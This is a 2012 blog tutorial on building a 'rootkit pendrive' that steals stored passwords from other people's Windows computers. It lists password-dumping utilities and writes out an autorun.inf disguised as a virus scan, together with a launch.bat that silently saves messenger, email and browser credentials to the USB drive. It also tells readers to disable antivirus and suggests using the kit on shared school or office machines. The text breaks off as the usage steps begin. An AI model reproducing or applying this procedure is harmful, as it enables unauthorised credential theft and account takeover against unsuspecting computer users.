Friday, May 25, 2012

How To Steal Passwords Using USB Drive (Create Rootkit Pendrive)

Today I am going to share with you a new cool way to hack passwords physically; it means that physical approach matters a lot for using this method. We will use a USB and some applications to hack stored passwords in any computer. 

                  

As we know now-a-days people sign up at large number of websites and to remember them all they store their passwords in the computer. We will try recovering them automatically using a USB drive. Yes, All we need is to plug the USB in any port. This trick will work for Windows 7, Windows XP, Windows 2000 and Windows Vista also. All the applications included are light enough and very portable that these can be pasted and downloaded in the USB disk in few seconds. You can also hack stored messenger passwords. It will help you if you are using a school combined computer or an official may be. Let’s start the tutorial:


Here are the applications which you will need to hack Passwords using USB:


MessenPass

Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. 

Download : MessenPass


Mail PassView

Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

Download : Mail Pass View


IE Passview

IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 

Download : IE Passview


Protected Storage PassView

Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…



PasswordFox

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Download : Password Fox



Update:- You can now also recover chrome and opera saved passwords. Just download these applications and add them to your attack. Since, Now you may basic knowledge that how this attack may work. First read complete post and then add these both. OperPassView and ChromePass



Here is a Step by Step Procedure to Create The Password Stealing Rootkit:



1. Download all the 5 tools, extract them and copy only the executables (.exe files) into your USB Pen drive.  Copy these files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:


[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


Save the Notepad with name autorun.inf Now copy the autorun.inf file onto your USB pendrive. 

3. Create another Notepad and write the following text onto it:


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


Save it as launch.bat. Copy the launch.bat file also to your USB drive.

* NOTE: You must temporarily disable your antivirus before following these steps.




How to Use this USB drive?


 
Now your toolkit is ready and you are all set to steal the passwords. You can use this Pen drive on any computer to steal the stored passwords. Just follow these steps: